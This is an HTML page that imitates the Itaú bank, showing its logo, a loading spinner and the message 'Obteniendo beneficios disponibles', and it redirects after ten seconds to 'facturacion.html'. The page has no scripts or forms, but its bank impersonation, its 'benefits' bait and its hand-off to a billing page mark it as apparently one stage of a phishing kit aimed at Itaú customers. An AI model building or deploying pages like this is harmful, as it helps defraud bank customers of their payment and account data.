
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="refresh" content="10; url='facturacion.html'">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Itaú</title>
    <style>
        body {
            margin: 0;
            padding: 0;
        }

        .container {
            text-align: center;
            font-family: Verdana;
            max-width: 800px;
            margin: 50px auto;
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        h1 {
            color: #343348;
            margin-top: 0px;
            margin-bottom: 10px;
        }

        .boton {
            cursor: pointer;
            background: #fc6202;
            color: #F4F4F4ff;
            border-radius: 4px;
            border: none;
            padding: 6px 16px;
            width: 250px;
            height: 40px;
            font-size: 0.875rem;
            line-height: 1.75;
            letter-spacing: 0.02857em;
            transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, border 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
            box-shadow: 0px 3px 1px -2px rgba(0, 0, 0, 0.2), 0px 2px 2px 0px rgba(0, 0, 0, 0.14), 0px 1px 5px 0px rgba(0, 0, 0, 0.12);
        }

        .boton:hover {
            text-decoration: none;
            background-color: #fc6202;
        }

        .footer-content {
            text-align: center;
            font-family: verdana;
            color: #6c757d !important;
            font-size: 12px;
            padding: 20px;
        }

        footer {
            position: fixed;
            left: 0;
            bottom: 0;
            width: 100%;
            background-color: #f4f4f4;
        }

        .loader {
            width: 78px;
            height: 78px;
            display: inline-block;
            position: relative;
            background-color: #F4F4F4ff;
            background: radial-gradient(ellipse at center, #fc6202 0%, #fc6202 14%, #F4F4F4ff 15%, #F4F4F4ff 100%);
            background-size: cover;
            background-position: center;
            border-radius: 50%;
        }

        .loader::after,
        .loader::before {
            content: '';
            position: absolute;
            height: 16px;
            width: 4px;
            background: #fc6202;
            top: 50%;
            left: 50%;
            transform: translateX(-50%) rotate(0deg);
            transform-origin: 25% 0;
            box-sizing: border-box;
            animation: rotation 10s linear infinite;
        }

        .loader::before {
            height: 22px;
            width: 2px;
            transform: translateX(-50%) rotate(0deg);
            animation-duration: 1s;
        }

        @keyframes rotation {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>
<body>
    <header>
        <img alt="Logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/19/Ita%C3%BA_Unibanco_logo_2023.svg/2048px-Ita%C3%BA_Unibanco_logo_2023.svg.png" width="60">
    </header>

    <section class="container">
        <div>
            <br>
            <br>
            <span class="loader"></span><br>
            <br>
            <h1 class="title">Obteniendo beneficios disponibles</h1>
            <p>Espera un momento, ya casi estamos.</p>
        </div>
    </section>

    <footer>
        <div class="footer-content">
            ITAU
        </div>
    </footer>
</body>
</html>
